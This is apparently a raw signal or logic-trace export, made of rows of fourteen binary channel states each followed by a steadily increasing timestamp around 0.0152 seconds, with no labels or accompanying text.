1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171020e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171028e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5171044e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171072e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5171076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171080e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171096e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171220e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171244e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171272e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171296e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171396e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171404e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5171420e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171452e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171472e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171496e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171696e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171820e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171844e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171872e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171896e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171900e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5171948e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5171972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5171980e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5171996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172020e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172044e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172072e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172096e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5172124e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5172172e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5172196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172204e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172296e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172420e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5172428e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5172444e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5172472e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5172524e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5172548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172696e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172820e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172844e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172872e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172896e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5172972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5172996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173072e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173096e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173292e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173324e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,1.5173348e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5173352e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5173396e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5173420e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173468e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173492e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173516e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173568e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173692e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173720e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173820e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173868e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5173876e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5173920e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5173948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173952e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5173972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5173996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174068e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174092e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174120e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174244e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5174248e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5174292e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5174320e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5174324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174328e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174372e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174468e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174492e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174520e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174568e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174692e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174716e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174820e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5174824e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5174868e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5174892e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174920e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5174972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5174996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175068e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175092e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175120e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175144e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175268e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175292e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175320e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175344e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175396e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175468e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5175476e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5175492e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5175520e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5175524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175528e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175544e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175692e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175720e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175744e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175820e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175872e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5175972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5175996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176020e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176044e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176072e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176096e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176220e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176244e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176272e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176296e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176372e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176472e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176624e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176652e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176676e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5176700e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5176724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5301344e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.5301556e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5301576e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,1.5301608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5301628e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5301908e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5301932e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5301956e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5301980e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5302004e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5302028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5302080e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5302104e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.5302108e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,1.5302132e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.5302156e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5302164e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302176e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302180e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302204e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302252e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5302260e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5302308e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5302332e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.5302336e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302504e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302532e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302580e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302680e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302704e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5302708e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5302756e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5302780e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302788e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302804e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302880e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302904e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302932e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5302956e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5302980e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303004e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303080e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303104e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303132e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303156e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303180e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303204e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303280e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303304e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5303308e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5303332e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5303356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303364e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303380e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303404e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303552e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303580e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303676e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303700e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303752e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303804e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303828e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303852e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5303856e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5303900e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5303928e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.5303932e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303936e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5303952e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5303976e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304004e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304076e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304084e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5304128e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304152e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304160e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304204e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304328e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304332e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5304348e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304400e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304428e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5304476e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5304500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304508e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304528e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304552e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304728e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304780e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304804e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304928e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5304952e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5304980e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305004e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305028e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305052e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305152e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305176e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305204e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305352e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305372e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5305404e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5305452e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5305476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305576e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305728e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305752e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305804e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305828e-02 